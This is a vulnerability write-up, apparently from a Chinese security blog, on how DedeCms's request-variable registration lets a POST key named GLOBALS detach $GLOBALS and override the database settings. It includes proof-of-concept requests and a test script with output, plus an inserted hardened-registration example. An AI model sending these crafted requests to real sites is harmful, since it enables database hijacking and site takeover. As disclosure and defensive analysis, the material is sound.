This case is quite embarrassing: we found that DedeCms has a problem this serious. It is also rumored that DedeCms can be attacked without logging into the admin backend.
On the Internet I also found an analysis by mr_xhming:
http://hi.baidu.com/mr_xhming/blog/item/5e6d6009d44b1f39e92488a5.html
It has a comment from an expert:
Overwrite the common.inc.php file:
    $GLOBALS['cfg_dbhost'];
    $GLOBALS['cfg_dbuser'];
    $GLOBALS['cfg_dbpwd'];
    $GLOBALS['cfg_dbname'];
    $GLOBALS['cfg_dbprefix'];
Then initialize the database class:
    // Introduce the database class
    require_once(DEDEINC.'/dedesql.class.php');
    // Global common functions
    require_once(DEDEINC.'/common.func.php');
    ?>
At the time I wondered why the DedeCms variable overwrite vulnerability could overwrite the database configuration variables at all, since the overwrite (or creation) of the variable happens first and the real value is assigned afterwards.
// include/common.inc.php
function _RunMagicQuotes(&$svar)
{
    if(!get_magic_quotes_gpc())
    {
        if(is_array($svar))
        {
            foreach($svar as $_k => $_v) $svar[$_k] = _RunMagicQuotes($_v);
        }
        else
        {
            $svar = addslashes($svar);
        }
    }
    return $svar;
}
if(!defined('DEDEREQUEST'))
{
    // Check and register externally submitted variables
    foreach($_REQUEST as $_k => $_v)
    {
        if(strlen($_k) > 0 && preg_match('/^(cfg_|GLOBALS)/', $_k))
        {
            exit('request var not allow!');
        }
    }
    foreach(Array('_GET', '_POST', '_COOKIE') as $_request)
    {
        foreach($$_request as $_k => $_v) ${$_k} = _RunMagicQuotes($_v); // the variable is overwritten here
    }
}
// System variable detection
if(!isset($needFilter))
{
    $needFilter = false;
}
$registerGlobals = @ini_get("register_globals");
$isUrlOpen = @ini_get("allow_url_fopen");
$isSafeMode = @ini_get("safe_mode");
if(preg_match('/windows/i', @getenv('OS')))
{
    $isSafeMode = false;
}
// Session save path
$sessSavePath = DEDEDATA."/sessions/";
if(is_writeable($sessSavePath) && is_readable($sessSavePath))
{
    session_save_path($sessSavePath);
}
// System configuration parameters
require_once(DEDEDATA."/config.cache.inc.php");
// Convert the variables related to uploaded files and apply security processing; the common upload functions are referenced at the front end
if($_FILES)
{
    require_once(DEDEINC.'/uploadsafe.inc.php');
}
// Database configuration file
require_once(DEDEDATA.'/common.inc.php'); // the database configuration file is included here
...
// Content of data/common.inc.php
<?php
// Database connection information
$cfg_dbhost = 'localhost';
$cfg_dbname = 'de2';
$cfg_dbuser = 'root';
$cfg_dbpwd = '';
$cfg_dbprefix = 'dede_';
$cfg_db_language = 'utf8';
?>
It seems that even if the $cfg_dbname variable is overwritten, $cfg_dbname is assigned its value again afterwards.
Then I thought that only system variables that were not initialized before the overwrite could be targeted. Still, I used this vulnerability in other ways and was lucky enough to get a shell. At that time I did not understand the expert's comment. (This vulnerability was announced in !) Back then the DedeCms variable overwrite was used to overwrite the $_FILES array. In fact there is something more serious besides that. Many people had discovered it, but nobody disclosed it, because it seemed useless. The DedeCms developers only patch what gets reported, and once the variable overwrite was fixed, nothing next to it looked obviously wrong. Now that they have fixed that vulnerability, some serious problems remain unfixed.
There is a lot here, and the key issue has still not been solved: the variable overwrite exists, but nobody knows how to make use of it.
The root cause is: are $cfg_dbname and $GLOBALS['cfg_dbname'] the same thing?
I thought they were one and the same, but in fact they are not.
We can do an experiment. Add a few lines of code to include/common.inc.php:
echo '-------------------------------------------------------</br>';
echo '$GLOBALS[cfg_dbname]:';
var_dump($GLOBALS['cfg_dbname']);
echo '-------------------------------------------------------</br>';
echo '$cfg_dbname';
var_dump($cfg_dbname);
// Database configuration file
echo '++++++++++++++++++++++++++++++++++++++++++++++++++++++++</br>';
require_once(DEDEDATA.'/common.inc.php');
echo '-------------------------------------------------------</br>';
echo '$GLOBALS[cfg_dbname]:';
var_dump($GLOBALS['cfg_dbname']);
echo '-------------------------------------------------------</br>';
echo '$cfg_dbname';
var_dump($cfg_dbname);
exit;
Submit http://www.bkjia.com/de2/index.php?_POST[cfg_dbname]=1234
The result is as follows:
---------------------------------------------------------
$GLOBALS[cfg_dbname]:string '1234' (length=4)
---------------------------------------------------------
$cfg_dbnamestring '1234' (length=4)
++++++++++++++++++++++++++++++++++++++++++++++++++++++++
---------------------------------------------------------
$GLOBALS[cfg_dbname]:string 'de2' (length=3)
---------------------------------------------------------
$cfg_dbnamestring 'de2' (length=3)
Submit: http://127.0.0.1/de2/index.php?_POST[GLOBALS][cfg_dbname]=1234
---------------------------------------------------------
$GLOBALS[cfg_dbname]:string '1234' (length=4)
---------------------------------------------------------
$cfg_dbnamenull
++++++++++++++++++++++++++++++++++++++++++++++++++++++++
---------------------------------------------------------
$GLOBALS[cfg_dbname]:string '1234' (length=4)
---------------------------------------------------------
$cfg_dbnamestring 'de2' (length=3)
Now we get the result we wanted, because of the database class that is included later:
    if ($GLOBALS['cfg_mysql_type'] == 'mysqli' && function_exists("mysqli_init")) {
        require_once(DEDEINC.'/dedesqli.class.php');
    } else {
        require_once(DEDEINC.'/dedesql.class.php');
    }
Its initialization function looks like this; the connection values are taken from the $GLOBALS['cfg_dbname'] family of variables:
    function Init($pconnect=FALSE)
    {
        $this->linkID = 0;
        $this->queryString = '';
        $this->parameters = Array();
        $this->dbHost = $GLOBALS['cfg_dbhost'];
        $this->dbUser = $GLOBALS['cfg_dbuser'];
        $this->dbPwd = $GLOBALS['cfg_dbpwd'];
        $this->dbName = $GLOBALS['cfg_dbname'];
        $this->dbPrefix = $GLOBALS['cfg_dbprefix'];
        $this->result["me"] = 0;
        $this->Open($pconnect);
    }
So it can be overwritten, because $GLOBALS['cfg_dbname'] is not equivalent to $cfg_dbname, although I had assumed it was.
In other words, after the overwrite, assigning to $GLOBALS['cfg_dbname'] and assigning to $cfg_dbname are two different things:
$GLOBALS['cfg_dbname'] no longer holds the same value as $cfg_dbname.
DedeCms reads its database configuration through the $GLOBALS['cfg_dbname'] variable.
Once the foreach loop overwrites $GLOBALS, $GLOBALS is no longer a superglobal; it has become an ordinary array, so $GLOBALS['cfg_dbname'] is no longer the same thing as $cfg_dbname. That is the key to the problem.
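The following is an added example, not DedeCms code. It puts the registration pattern from include/common.inc.php quoted above (screen $_REQUEST, then turn every key of $_GET/$_POST/$_COOKIE into a variable) beside a hardened version that screens each source on its own and registers only whitelisted names. The request arrays, the function names forbiddenKeys() and registerSafe(), and the whitelist are assumptions made for the demonstration. It assumes a PHP 5.x or 7.x interpreter: from PHP 8.1 on, reassigning $GLOBALS as a whole is a compile-time error, so the rebinding in the second part no longer runs there.

```php
<?php
// Added example, not DedeCms code. Contrasts the unsafe registration loop
// from include/common.inc.php with a version that screens every source.
// Assumes PHP < 8.1: since 8.1, reassigning $GLOBALS as a whole is an error.

// Constructed request, standing in for what the web server would populate.
// The outer key 'GLOBALS' arrives in $_POST; the original code's check on
// $_REQUEST never sees it if request_order excludes P, and even when it does,
// nothing stops the same key from being delivered through $_GET['_POST'].
$_GET    = array('page' => '2');
$_POST   = array('GLOBALS' => array('cfg_dbname' => 'attacker_db'), 'title' => 'hello');
$_COOKIE = array();

// Names that must never become variables: the $GLOBALS table itself, the
// cfg_* configuration variables, and the superglobals. PHP variable names are
// case-sensitive, so the match is too.
function forbiddenKeys(array $source)
{
    $bad = array();
    foreach ($source as $k => $v) {
        if (preg_match('/^(GLOBALS$|cfg_|_(GET|POST|COOKIE|REQUEST|SERVER|ENV|FILES|SESSION)$)/', $k)) {
            $bad[] = $k;
        }
    }
    return $bad;
}

// Hardened registration (assumed design): check every source separately instead
// of relying on $_REQUEST, and copy only the expected names into a plain array
// that the caller reads explicitly. No ${$k} = $v anywhere.
function registerSafe(array $sources, array $allowed)
{
    $vars = array();
    foreach ($sources as $name => $source) {
        $bad = forbiddenKeys($source);
        if ($bad) {
            // Same disposition as the original's exit('request var not allow!').
            throw new RuntimeException("$name: forbidden key(s) " . implode(', ', $bad));
        }
        foreach ($allowed as $k) {
            if (array_key_exists($k, $source)) {
                $vars[$k] = $source[$k];
            }
        }
    }
    return $vars;
}

// 1. Hardened path: the constructed request is rejected before any variable
//    is created, because $_POST carries the key GLOBALS.
try {
    $vars = registerSafe(
        array('_GET' => $_GET, '_POST' => $_POST, '_COOKIE' => $_COOKIE),
        array('page', 'title')
    );
    echo "registered: ", implode(', ', array_keys($vars)), "\n";
} catch (RuntimeException $e) {
    echo "rejected: ", $e->getMessage(), "\n";
}

// 2. For comparison, the original pattern inlined at file scope (it has to be
//    at file scope: inside a function ${$_k} would only create a local).
$before = ($GLOBALS['_POST'] === $_POST);   // $GLOBALS still aliases the symbol table
foreach (array('_GET', '_POST', '_COOKIE') as $_request) {
    foreach ($$_request as $_k => $_v) ${$_k} = $_v;   // $_k === 'GLOBALS' rebinds $GLOBALS
}
$cfg_dbname = 'de2';                        // what data/common.inc.php sets afterwards
$after = isset($GLOBALS['_POST']);          // false: $GLOBALS is now an ordinary array
echo "superglobal before: ", var_export($before, true),
     ", after: ", var_export($after, true), "\n";
echo "\$cfg_dbname=", $cfg_dbname,
     " but \$GLOBALS['cfg_dbname']=", $GLOBALS['cfg_dbname'], "\n";
```

Run it with the PHP CLI on a pre-8.1 interpreter. The hardened function screens each source individually for two reasons visible in the original code: $_REQUEST is assembled according to the request_order ini setting and may omit cookies entirely, and the original loop reads $$_request on every iteration, so a key named _POST delivered through $_GET replaces $_POST before the loop reaches it. Detaching $GLOBALS from the symbol table is the effect the experiment in this post measures; the $before/$after pair is the one-line check that tells you whether it has happened.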
The proof code is as follows:
<?php
$_POST['GLOBALS']['cfg_dbname'] = '123';
var_dump($GLOBALS);
foreach($_POST as $k => $v){ $$k = $v; }
echo '~~~~~~~~~~~~~~~~~~~~~~';
echo $cfg_dbname.':'.$GLOBALS['cfg_dbname'];
echo '+++++++++++++++++++++++';
var_dump($GLOBALS);
$cfg_dbname = '456';
echo '-----------------------';
echo $cfg_dbname.':'.$GLOBALS['cfg_dbname'];
?>
The result is as follows:
array
  'GLOBALS' => &array
  'HTTP_HOST' => string '127.1' (length=5)
  'HTTP_USER_AGENT' => string 'Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.20) Gecko/20110803 Firefox/3.6.20' (length=90)
  'HTTP_ACCEPT' => string 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' (length=63)
  'HTTP_ACCEPT_LANGUAGE' => string 'zh-cn,zh;q=0.5' (length=14)
  'HTTP_ACCEPT_ENCODING' => string 'gzip,deflate' (length=12)
  'HTTP_ACCEPT_CHARSET' => string 'GB2312,utf-8;q=0.7,*;q=0.7' (length=26)
  'HTTP_KEEP_ALIVE' => string '115' (length=3)
  'HTTP_CONNECTION' => string 'keep-alive' (length=10)
  'PATH' => string 'C:\Program Files\Common Files\Microsoft Shared\Windows Live;C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\ThinkPad\Bluetooth Software\;C:\Program Files\ThinkPad\Bluetooth Software\syswow64;C:\Program Files\Intel\WiFi\bin\;C:\Program Files\Common Files\Intel\WirelessCommon\;C:\Program Files (x86)\Common Files\Lenovo;C:\Program Files (x86)\Common Files\Ulead Systems\MPEG;C:\'... (length=975)
  'SystemRoot' => string 'C:\Windows' (length=10)
  'COMSPEC' => string 'C:\Windows\system32\cmd.exe' (length=27)
  'PATHEXT' => string '.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC' (length=53)
  'WINDIR' => string 'C:\Windows' (length=10)
  'SERVER_SIGNATURE' => string '' (length=0)
  'SERVER_SOFTWARE' => string 'Apache/2.2.17 (Win32) PHP/5.3.5' (length=31)
  'SERVER_NAME' => string '127.1' (length=5)
  'SERVER_ADDR' => string '127.0.0.1' (length=9)
  'SERVER_PORT' => string '80' (length=2)
  'REMOTE_HOST' => string 'web9.vghtpe.gov.tw' (length=18)
  'REMOTE_ADDR' => string '127.0.0.1' (length=9)
  'DOCUMENT_ROOT' => string 'C:/wamp/www/' (length=12)
  'SERVER_ADMIN' => string 'admin@localhost' (length=15)
  'SCRIPT_FILENAME' => string 'C:/wamp/www/5.php' (length=17)
  'REMOTE_PORT' => string '53482' (length=5)
  'GATEWAY_INTERFACE' => string 'CGI/1.1' (length=7)
  'SERVER_PROTOCOL' => string 'HTTP/1.1' (length=8)
  'REQUEST_METHOD' => string 'GET' (length=3)
  'QUERY_STRING' => string '' (length=0)
  'REQUEST_URI' => string '/5.php' (length=6)
  'SCRIPT_NAME' => string '/5.php' (length=6)
  'PHP_SELF' => string '/5.php' (length=6)
  'REQUEST_TIME' => int 1314794715
  '_POST' => array
    'GLOBALS' => array
      'cfg_dbname' => string '123' (length=3)
  '_GET' => array empty
  '_COOKIE' => array empty
  '_SERVER' => array
    'HTTP_HOST' => string '127.1' (length=5)
    'HTTP_USER_AGENT' => string 'Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.20) Gecko/20110803 Firefox/3.6.20' (length=90)
    'HTTP_ACCEPT' => string 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' (length=63)
    'HTTP_ACCEPT_LANGUAGE' => string 'zh-cn,zh;q=0.5' (length=14)
    'HTTP_ACCEPT_ENCODING' => string 'gzip,deflate' (length=12)
    'HTTP_ACCEPT_CHARSET' => string 'GB2312,utf-8;q=0.7,*;q=0.7' (length=26)
    'HTTP_KEEP_ALIVE' => string '115' (length=3)
    'HTTP_CONNECTION' => string 'keep-alive' (length=10)
    'PATH' => string 'C:\Program Files\Common Files\Microsoft Shared\Windows Live;C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\ThinkPad\Bluetooth Software\;C:\Program Files\ThinkPad\Bluetooth Software\syswow64;C:\Program Files\Intel\WiFi\bin\;C:\Program Files\Common Files\Intel\WirelessCommon\;C:\Program Files (x86)\Common Files\Lenovo;C:\Program Files (x86)\Common Files\Ulead Systems\MPEG;C:\'... (length=975)
    'SystemRoot' => string 'C:\Windows' (length=10)
    'COMSPEC' => string 'C:\Windows\system32\cmd.exe' (length=27)
    'PATHEXT' => string '.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC' (length=53)
    'WINDIR' => string 'C:\Windows' (length=10)
    'SERVER_SIGNATURE' => string '' (length=0)
    'SERVER_SOFTWARE' => string 'Apache/2.2.17 (Win32) PHP/5.3.5' (length=31)
    'SERVER_NAME' => string '127.1' (length=5)
    'SERVER_ADDR' => string '127.0.0.1' (length=9)
    'SERVER_PORT' => string '80' (length=2)
    'REMOTE_HOST' => string 'web9.vghtpe.gov.tw' (length=18)
    'REMOTE_ADDR' => string '127.0.0.1' (length=9)
    'DOCUMENT_ROOT' => string 'C:/wamp/www/' (length=12)
    'SERVER_ADMIN' => string 'admin@localhost' (length=15)
    'SCRIPT_FILENAME' => string 'C:/wamp/www/5.php' (length=17)
    'REMOTE_PORT' => string '53482' (length=5)
    'GATEWAY_INTERFACE' => string 'CGI/1.1' (length=7)
    'SERVER_PROTOCOL' => string 'HTTP/1.1' (length=8)
    'REQUEST_METHOD' => string 'GET' (length=3)
    'QUERY_STRING' => string '' (length=0)
    'REQUEST_URI' => string '/5.php' (length=6)
    'SCRIPT_NAME' => string '/5.php' (length=6)
    'PHP_SELF' => string '/5.php' (length=6)
    'REQUEST_TIME' => int 1314794715
  '_ENV' => array empty
  '_FILES' => array empty
  '_REQUEST' => array empty
~~~~~~~~~~~~~~~~~~~~~~:123
+++++++++++++++++++++++
array
  'cfg_dbname' => string '123' (length=3)
-----------------------
456:123
from: 0x50sec.org